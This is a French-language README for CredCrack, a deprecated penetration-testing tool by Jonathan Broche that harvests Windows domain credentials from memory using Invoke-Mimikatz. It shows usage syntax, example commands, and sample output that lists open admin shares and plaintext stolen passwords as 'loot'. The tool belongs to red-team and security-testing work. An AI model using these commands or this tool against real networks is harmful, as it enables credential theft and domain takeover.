
Un moissonneur de credentials rapide et furtif
⛔ [DÉPRÉCIÉ]. Ce dépôt n'est plus maintenu. Veuillez plutôt utiliser CrackMapExec.
CredCrack est un moissonneur d'identifiants rapide et furtif. Il exfiltre les identifiants de manière récursive en mémoire et en clair. Une fois terminé, CredCrack analyse et affiche les identifiants tout en identifiant les administrateurs de domaine obtenus. CredCrack permet également de lister et d'énumérer les accès aux partages, et oui, il est threadé !
CredCrack a été testé et fonctionne avec les outils natifs de Kali Linux. CredCrack nécessite uniquement que "Invoke-Mimikatz.ps1" de PowerSploit se trouve sous le répertoire /var/www. Télécharger Invoke-Mimikatz ici
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
[-l LHOST] [-t THREADS]
CredCrack - Un moissonneur d'identifiants furtif par Jonathan Broche (@g0jhonny)
arguments optionnels:
-h, --help affiche ce message d'aide et quitte
-f FILE, --file FILE Fichier contenant les IP à moissonner pour les identifiants. Une IP par ligne.
-r RHOST, --rhost RHOST
IP de l'hôte distant à moissonner pour les identifiants.
-es, --enumshares Examine l'accès aux partages sur la ou les IP distantes
-l LHOST, --lhost LHOST
IP de l'hôte local pour lancer les scans.
-t THREADS, --threads THREADS
Nombre de threads (par défaut : 10)
Requis:
-d DOMAIN, --domain DOMAIN
Domaine ou poste de travail
-u USER, --user USER Nom d'utilisateur du domaine
Exemples :
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Mot de passe :
---------------------------------------------------------------------
CredCrack v1.1 par Jonathan Broche (@g0jhonny)
---------------------------------------------------------------------
[*] Validation de 192.168.1.102
[*] Validation de 192.168.1.103
[*] Validation de 192.168.1.100
-----------------------------------------------------------------
192.168.1.102 - Windows 7 Professionnel 7601 Service Pack 1
-----------------------------------------------------------------
OUVERT \\192.168.1.102\ADMIN$
OUVERT \\192.168.1.102\C$
-----------------------------------------------------------------
192.168.1.103 - Windows Vista (TM) Intégrale 6002 Service Pack 2
-----------------------------------------------------------------
OUVERT \\192.168.1.103\ADMIN$
OUVERT \\192.168.1.103\C$
FERMÉ \\192.168.1.103\F$
-----------------------------------------------------------------
192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
-----------------------------------------------------------------
FERMÉ \\192.168.1.100\ADMIN$
FERMÉ \\192.168.1.100\C$
OUVERT \\192.168.1.100\NETLOGON
OUVERT \\192.168.1.100\SYSVOL
[*] Terminé ! Effectué en 0.8s
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Mot de passe :
---------------------------------------------------------------------
CredCrack v1.1 par Jonathan Broche (@g0jhonny)
---------------------------------------------------------------------
[*] Préparation de la scène
[*] Validation de 192.168.1.102
[*] Validation de 192.168.1.103
[*] Interrogation du groupe des administrateurs du domaine depuis 192.168.1.102
[*] Moissonnage des identifiants depuis 192.168.1.102
[*] Moissonnage des identifiants depuis 192.168.1.103
Le butin est arrivé...
__________
/\____;;___\
| / /
`. ())oo() .
|\(%()*^^()^\
%| |-%-------|
% \ | % )) |
% \|%________|
[*] Hôte : 192.168.1.102 Domaine : ACME Utilisateur : jsmith Mot de passe : Good0ljm1th
[*] Hôte : 192.168.1.103 Domaine : ACME Utilisateur : daguy Mot de passe : P@ssw0rd1!
1 administrateur de domaine trouvé et mis en évidence en jaune ci-dessus !
[*] Nettoyage
[*] Terminé ! Le butin se trouve dans le dossier /root/CCloot
[*] Effectué en 11.3s
Contactez-moi sur @g0jhonny pour toute question ou fonctionnalité que vous souhaiteriez voir dans la prochaine mise à jour. Pour les bogues, soumettez un problème !
CredCrack n'aurait pas été possible sans les contributions des personnes suivantes. Vous êtes tous des rockstars ! @JosephBialek, @brav0hax, @altonjx et tous les autres ! Merci pour toutes vos contributions et vos retours qui ont permis d'améliorer ce script, continuez à les envoyer !